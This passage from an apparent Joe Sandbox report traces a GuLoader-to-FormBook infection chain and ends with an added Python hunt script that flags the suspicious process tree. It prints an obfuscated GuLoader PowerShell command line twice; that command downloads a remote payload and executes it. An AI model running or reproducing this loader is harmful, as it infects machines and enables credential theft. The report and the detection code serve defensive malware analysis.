sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. 
ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePanccMicruMilirK.umiWafft irtyArguPMortrpr goBecotCutao BlocBo uoEufolspri C.nc=.ldr Geni[Ret.NKl,ke ertpost.S raS nteeDmp cBayouRgrirColliMorttBibly TilPBis r humoVenttPrteo Q acF nkoBetllUterT RawyUnnepScraeGste]K nd: Rom:SkurTMar lHjems Gul1 Slu2P,as ');$nucleli=$Tandemcykels[0];$Akkompagnatr142= (Antikvitetsforretnings 'Skra$ Ky.g UnflKl bo,nhobTapaaRelalHexa:run.LAtteeDuchntrkas,ydfbBaana.efrr Dr oFanen ProeHaphr MonsAabe=hausNDgndeDankw .ur-KalkO,ehebKredjPr sePrimc TestNont CoedS SnoyHemisDis,tS beeTrkpmSwop.H,stNLadde AartUdle.TrykWNarse Sl,bHj.pCoverl UdliBeroe TvenGlutt');$Akkompagnatr142+=$Metalism[1];Unthrust ($Akkompagnatr142);Unthrust (Antikvitetsforretnings 'se,v$L tlLPsyceFoinnBuresParab Va,aBundr S aoJordnTaute,oler,leksRati.g zpH.illeGrnsaUnded NoneDe.prStems Lg.[Phyt$.sycT tonoForsrUndiuAfs mVelbsPreslFelteLovejCenolCardi FoegSa.ghErhve Le dForus O,e]Revo=Sama$OpbiASkranWhimt Svno U,cnakvaiIsthnUdd aSukks Fun ');$barser=Antikvitetsforretnings 'Elev$AfgiLEccle AponAntrsYpp.b StoaYardrKvleoBangnUnteeKedlr O.es Dob.Em lDFortoK plw .avnAn,alud,ao,ilkaspend.rifF Un.i nylKr,meAnsg(Fl g$ZealnEndruAlvec en,lCa eeCa.alAfhsiSpu,,unde$InteOTe,ipForupTr gr fusoFustbGeorrAr,eiPeriaDirkt Usue RhedI.fo)Nonu ';$Opprobriated=$Metalism[0];Unthrust (Antikvitetsforretnings 'Cohe$H,nkgChenl.paroDiabbelseaDyrelRema: TiqRResse.indcHyphi rketRothe Sno=B.ie(PladTsubieDiaksUnretGrun-DeflPRumlaanaltWenchS.mp Skol$ tr,OSuccppilopantirDemioSammb Pror ini NonaPseltUncoe Tvrd Non)Ax,l ');while (!$Recite) {Unthrust (Antikvitetsforretnings 'Pans$Bilpg AtalAddyoEp cbWalda enilT,eo: OliFGelioCheerAfhrmH.ndgTilriTrafvFun,eSjasrUndee elp=B sa$GodttSi.orBooguCitae Ele ') ;Unthrust $barser;Unthrust (Antikvitetsforretnings 
'.ropSPrivt,ondaincorMi rtScor- ResSRteblS aseFor,eOp,lpRes Lip.4 ,il ');Unthrust (Antikvitetsforretnings ' tal$Ara gUnofl slaoNedkb ubaArvelAnte:linoRModte,olyc,itriFr.ttCapaebark= Gra( SheTVandeHu.dsUdfrt ,or-UnsiP ermavisstByelhHjer .nt$DecaO CripProlpElmir,nvlo SlabUntirBerriFedta Sprt SimeTangd,ifi)Gend ') ;Unthrust (Antikvitetsforretnings 'Ro,e$Spilg isjlPn.uo PrebOocya RevlAthl:PalmSSealafettpSlutrqu teLipomDomeivirgaRe,i1Dolo5Fler7Ra,n=emot$Brkeg NublMonaoCmrebSteaaBo glOver:C oiLDuk,aAasen VatdUndebD cirSpaduB.lmgS.iss Cazm PyosInstsPr,tilacigGutteUdsus ega+ Noe+T,bu%W ne$ Ri T Homanoncn Ma.d WanegrilmRo.fcNulpyB rokColoe cral ints,eso.Presc MitoBreauFlagnOvert F r ') ;$nucleli=$Tandemcykels[$Sapremia157];}$Hyacint=296268;$Shutterwise=28855;Unthrust (Antikvitetsforretnings 'Mast$GossgPoppl EndoimmabOpska,usel In,:AbraU lbid P sb N.nrSha eCh.mdCoareLuncs ou sge=Pret funkGUdd,eGrattOver-EnspC Arso BlonNasct Akae Klan watSa,t Fuzz$W,tcO.ocupundepDejlrSheaoPalebOsterBud.i.ispaForft FoseAcadd Fo ');Unthrust (Antikvitetsforretnings 'So,r$ MisgThrilTi so.prrbTrada aml.esk:ScypH Antnre.lsFl.geLin,a artvScenlS lkeSkvirFlgb Del=.mpe Sjle[GamoSBagay inisAccotDisseOrthmBa,y.RebuC,oneoA mrn astvJapaeg,rtrForutudre]Mirt: lo:Zo,aF D pr Mono.rotmJoveBProvaJa zs oite Bre6Be.l4InfaSSbeht AnerKooliov rnErytg R.d(Bril$MamlU BesdKes bSikkrEnc,e.ommd.arveMotisbagg),ndi ');Unthrust (Antikvitetsforretnings 'Ub.f$AnjagUmu,lrealoSkanbN tra re,lD kk:,ensEFrotr WelnArkaeNells QuatTraui D,snHov.eCam sBa.t Noe=Film Disr[SojaSOpskyMerlsUnfotNo,seG,ubmGuat.OyesTStdee Cr,xFordt dol.SvarEForln ColcDef,oKvetdHumbiSyltn WalgSe a]Klod:S rv:ProgALivsS venCAposIAnovIFilt.ScarGdokeeRespt .oaSModitSig,r illi kasn GlogLreb(Card$P,ncHD lanFor,scentePopuaSlusv usclDiskeLapirBal )Styr ');Unthrust (Antikvitetsforretnings 'Rumb$ RecgS,lvl PreoVarib N,paAnmelde,i:T.ttzAnthoSv.pb.verlTarde ,krn PlesHi,h=.alv$ UnmE,roorB,ndnRefreBn hsv,sttIndii ThenTe.lePinhsUrim.,ogfs Preu.hrebSporsSurrtSubsrReveiSignn 
z.ngUdsp(Fo,v$ diaHMessyTr.daOps,cAnslim stn eeltMart,Kont$ Fo.SOughhMit.uUntotFysitHat,eUnmorBu.lw FamiTutrsAdumePlan)Estr ');Unthrust $zoblens;"
                  Imagebase: 0x7ff7be880000
                  File size: 452'608 bytes
                  MD5 hash: 04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2767467645.000001B110072000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation: high
                  Has exited: true

                  Target ID: 3
                  Start time: 07:11:57
                  Start date: 11/07/2024
                  Path: C:\Windows\System32\conhost.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase: 0x7ff6d64d0000
                  File size: 862'208 bytes
                  MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high
                  Has exited: true

                  Target ID: 5
                  Start time: 07:11:59
                  Start date: 11/07/2024
                  Path: C:\Windows\System32\cmd.exe
                  Wow64 process (32bit): false
                  Commandline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"
                  Imagebase: 0x7ff7addf0000
                  File size: 289'792 bytes
                  MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high
                  Has exited: true

                  Target ID: 6
                  Start time: 07:12:07
                  Start date: 11/07/2024
                  Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit): true
                  Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. 
g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. 
ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePanccMicruMilirK.umiWafft irtyArguPMortrpr goBecotCutao BlocBo uoEufolspri C.nc=.ldr Geni[Ret.NKl,ke ertpost.S raS nteeDmp cBayouRgrirColliMorttBibly TilPBis r humoVenttPrteo Q acF nkoBetllUterT RawyUnnepScraeGste]K nd: Rom:SkurTMar lHjems Gul1 Slu2P,as ');$nucleli=$Tandemcykels[0];$Akkompagnatr142= (Antikvitetsforretnings 'Skra$ Ky.g UnflKl bo,nhobTapaaRelalHexa:run.LAtteeDuchntrkas,ydfbBaana.efrr Dr oFanen ProeHaphr MonsAabe=hausNDgndeDankw .ur-KalkO,ehebKredjPr sePrimc TestNont CoedS SnoyHemisDis,tS beeTrkpmSwop.H,stNLadde AartUdle.TrykWNarse Sl,bHj.pCoverl UdliBeroe TvenGlutt');$Akkompagnatr142+=$Metalism[1];Unthrust ($Akkompagnatr142);Unthrust (Antikvitetsforretnings 'se,v$L tlLPsyceFoinnBuresParab Va,aBundr S aoJordnTaute,oler,leksRati.g zpH.illeGrnsaUnded NoneDe.prStems Lg.[Phyt$.sycT tonoForsrUndiuAfs mVelbsPreslFelteLovejCenolCardi FoegSa.ghErhve Le dForus O,e]Revo=Sama$OpbiASkranWhimt Svno U,cnakvaiIsthnUdd aSukks Fun ');$barser=Antikvitetsforretnings 'Elev$AfgiLEccle AponAntrsYpp.b StoaYardrKvleoBangnUnteeKedlr O.es Dob.Em lDFortoK plw .avnAn,alud,ao,ilkaspend.rifF Un.i nylKr,meAnsg(Fl g$ZealnEndruAlvec en,lCa eeCa.alAfhsiSpu,,unde$InteOTe,ipForupTr gr fusoFustbGeorrAr,eiPeriaDirkt Usue RhedI.fo)Nonu ';$Opprobriated=$Metalism[0];Unthrust (Antikvitetsforretnings 'Cohe$H,nkgChenl.paroDiabbelseaDyrelRema: TiqRResse.indcHyphi rketRothe Sno=B.ie(PladTsubieDiaksUnretGrun-DeflPRumlaanaltWenchS.mp Skol$ tr,OSuccppilopantirDemioSammb Pror ini NonaPseltUncoe Tvrd Non)Ax,l ');while (!$Recite) {Unthrust (Antikvitetsforretnings 'Pans$Bilpg AtalAddyoEp cbWalda enilT,eo: OliFGelioCheerAfhrmH.ndgTilriTrafvFun,eSjasrUndee elp=B sa$GodttSi.orBooguCitae Ele ') ;Unthrust $barser;Unthrust (Antikvitetsforretnings 
'.ropSPrivt,ondaincorMi rtScor- ResSRteblS aseFor,eOp,lpRes Lip.4 ,il ');Unthrust (Antikvitetsforretnings ' tal$Ara gUnofl slaoNedkb ubaArvelAnte:linoRModte,olyc,itriFr.ttCapaebark= Gra( SheTVandeHu.dsUdfrt ,or-UnsiP ermavisstByelhHjer .nt$DecaO CripProlpElmir,nvlo SlabUntirBerriFedta Sprt SimeTangd,ifi)Gend ') ;Unthrust (Antikvitetsforretnings 'Ro,e$Spilg isjlPn.uo PrebOocya RevlAthl:PalmSSealafettpSlutrqu teLipomDomeivirgaRe,i1Dolo5Fler7Ra,n=emot$Brkeg NublMonaoCmrebSteaaBo glOver:C oiLDuk,aAasen VatdUndebD cirSpaduB.lmgS.iss Cazm PyosInstsPr,tilacigGutteUdsus ega+ Noe+T,bu%W ne$ Ri T Homanoncn Ma.d WanegrilmRo.fcNulpyB rokColoe cral ints,eso.Presc MitoBreauFlagnOvert F r ') ;$nucleli=$Tandemcykels[$Sapremia157];}$Hyacint=296268;$Shutterwise=28855;Unthrust (Antikvitetsforretnings 'Mast$GossgPoppl EndoimmabOpska,usel In,:AbraU lbid P sb N.nrSha eCh.mdCoareLuncs ou sge=Pret funkGUdd,eGrattOver-EnspC Arso BlonNasct Akae Klan watSa,t Fuzz$W,tcO.ocupundepDejlrSheaoPalebOsterBud.i.ispaForft FoseAcadd Fo ');Unthrust (Antikvitetsforretnings 'So,r$ MisgThrilTi so.prrbTrada aml.esk:ScypH Antnre.lsFl.geLin,a artvScenlS lkeSkvirFlgb Del=.mpe Sjle[GamoSBagay inisAccotDisseOrthmBa,y.RebuC,oneoA mrn astvJapaeg,rtrForutudre]Mirt: lo:Zo,aF D pr Mono.rotmJoveBProvaJa zs oite Bre6Be.l4InfaSSbeht AnerKooliov rnErytg R.d(Bril$MamlU BesdKes bSikkrEnc,e.ommd.arveMotisbagg),ndi ');Unthrust (Antikvitetsforretnings 'Ub.f$AnjagUmu,lrealoSkanbN tra re,lD kk:,ensEFrotr WelnArkaeNells QuatTraui D,snHov.eCam sBa.t Noe=Film Disr[SojaSOpskyMerlsUnfotNo,seG,ubmGuat.OyesTStdee Cr,xFordt dol.SvarEForln ColcDef,oKvetdHumbiSyltn WalgSe a]Klod:S rv:ProgALivsS venCAposIAnovIFilt.ScarGdokeeRespt .oaSModitSig,r illi kasn GlogLreb(Card$P,ncHD lanFor,scentePopuaSlusv usclDiskeLapirBal )Styr ');Unthrust (Antikvitetsforretnings 'Rumb$ RecgS,lvl PreoVarib N,paAnmelde,i:T.ttzAnthoSv.pb.verlTarde ,krn PlesHi,h=.alv$ UnmE,roorB,ndnRefreBn hsv,sttIndii ThenTe.lePinhsUrim.,ogfs Preu.hrebSporsSurrtSubsrReveiSignn 
z.ngUdsp(Fo,v$ diaHMessyTr.daOps,cAnslim stn eeltMart,Kont$ Fo.SOughhMit.uUntotFysitHat,eUnmorBu.lw FamiTutrsAdumePlan)Estr ');Unthrust $zoblens;"
                  Imagebase:0xa0000
                  File size:433'152 bytes
                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2609327790.00000000080B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2609998888.000000000A058000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2599496258.0000000005493000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  Target ID:7
                  Start time:07:12:08
                  Start date:11/07/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"
                  Imagebase:0x790000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:9
                  Start time:07:12:31
                  Start date:11/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                  Imagebase:0x780000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:10
                  Start time:07:12:31
                  Start date:11/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                  Imagebase:0x780000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2791447025.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2791447025.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2819135013.0000000022090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2819135013.0000000022090000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.2791578179.00000000041A8000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  Target ID:13
                  Start time:07:13:04
                  Start date:11/07/2024
                  Path:C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe"
                  Imagebase:0x990000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  Target ID:14
                  Start time:07:13:06
                  Start date:11/07/2024
                  Path:C:\Windows\SysWOW64\clip.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\SysWOW64\clip.exe"
                  Imagebase:0x80000
                  File size:24'576 bytes
                  MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3034416950.0000000004020000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3034416950.0000000004020000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3034142738.0000000002740000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3034142738.0000000002740000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  Reputation:moderate
                  Has exited:true

                  Target ID:15
                  Start time:07:13:19
                  Start date:11/07/2024
                  Path:C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe"
                  Imagebase:0x990000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.3289574543.0000000005790000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.3289574543.0000000005790000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  Target ID:16
                  Start time:07:13:22
                  Start date:11/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                  Imagebase:0x780000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:17
                  Start time:07:13:22
                  Start date:11/07/2024
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                  Imagebase:0x7ff77fb80000
                  File size:71'680 bytes
                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:18
                  Start time:07:13:30
                  Start date:11/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                  Imagebase:0x780000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:19
                  Start time:07:13:31
                  Start date:11/07/2024
                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                  Wow64 process (32bit):
                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Imagebase:
                  File size:676'768 bytes
                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:false

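The process list above carries the chain a detection engineer would hunt for on a live estate: cmd.exe invoked only to echo %appdata% so a dropper can resolve its own path, wab.exe (Windows Contacts) started outside an interactive session and then spawning further processes, and a payload executing from a folder under Program Files (x86) whose name is clearly generated. The Python hunt below is an added example, not part of the Joe Sandbox report. The process-creation events it runs over are constructed to mirror the listing; the parent/child links, the PowerShell image path, the wab.exe parent allow-list and the thresholds in the random-folder heuristic are assumptions, since this section of the report does not record parent PIDs.

```python
"""Process-tree hunt over constructed events that mirror this report's process list.

Added example, not part of the Joe Sandbox report. Parent PIDs, the PowerShell
image path and the allow-lists are assumptions; the report section does not
list parent processes.
"""
import math
import re
from collections import Counter
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str    # full image path as a Sysmon/EDR process-creation event carries it
    cmdline: str


# Constructed sample events. PIDs follow the report's Target IDs where one exists;
# parent links (ppid) are assumed, not taken from the report.
SAMPLE_EVENTS = [
    ProcEvent(1, 0, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(6, 1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe (obfuscated script omitted)"),
    ProcEvent(7, 6, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"'),
    ProcEvent(9, 6, r"C:\Program Files (x86)\Windows Mail\wab.exe",
              r'"C:\Program Files (x86)\windows mail\wab.exe"'),
    ProcEvent(10, 9, r"C:\Program Files (x86)\Windows Mail\wab.exe",
              r'"C:\Program Files (x86)\windows mail\wab.exe"'),
    ProcEvent(13, 10,
              r"C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe",
              r'"C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe"'),
    ProcEvent(14, 13, r"C:\Windows\SysWOW64\clip.exe", r'"C:\Windows\SysWOW64\clip.exe"'),
    ProcEvent(17, 1, r"C:\Windows\System32\rundll32.exe",
              r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,"
              r"SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding"),
    ProcEvent(19, 1, r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
]

# wab.exe (Windows Contacts) is an interactive tool; a script host as its parent
# is the anomaly. The allow-list is an assumption for this example.
WAB_ALLOWED_PARENTS = {"explorer.exe"}
PROGRAM_FILES_DIRS = {"program files", "program files (x86)"}


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def shannon_entropy(s: str) -> float:
    """Bits per character of the string's symbol distribution."""
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def looks_random_dirname(name: str, min_len: int = 20, min_entropy: float = 4.0) -> bool:
    """Heuristic for generated folder names: long, alphanumeric only, mixed case,
    high entropy. Thresholds are assumptions chosen to keep vendor folders such
    as 'Windows Mail' or 'Mozilla Firefox' below the bar."""
    if len(name) < min_len or not re.fullmatch(r"[A-Za-z0-9]+", name):
        return False
    if name.islower() or name.isupper():
        return False
    return shannon_entropy(name) >= min_entropy


def hunt(events):
    """Return (rule, pid) pairs for every event matching one of four rules."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        # Rule 1: wab.exe started by something other than the interactive shell.
        if name == "wab.exe" and pname not in WAB_ALLOWED_PARENTS:
            hits.append(("wab_unusual_parent", e.pid))
        # Rule 2: wab.exe spawning anything at all.
        if pname == "wab.exe":
            hits.append(("wab_unusual_child", e.pid))
        # Rule 3: binary running from Program Files under a generated folder name.
        parts = PureWindowsPath(e.image).parts   # ('C:\\', 'Program Files (x86)', dir, exe)
        if len(parts) == 4 and parts[1].lower() in PROGRAM_FILES_DIRS and looks_random_dirname(parts[2]):
            hits.append(("random_dir_under_program_files", e.pid))
        # Rule 4: cmd.exe used only to expand %appdata% for a dropper path.
        if name == "cmd.exe" and re.search(r"echo\s+%appdata%", e.cmdline, re.IGNORECASE):
            hits.append(("cmd_echo_appdata", e.pid))
    return hits


if __name__ == "__main__":
    by_pid = {e.pid: e for e in SAMPLE_EVENTS}
    for rule, pid in hunt(SAMPLE_EVENTS):
        print(f"{rule:32s} pid={pid:<3d} {by_pid[pid].cmdline}")
```

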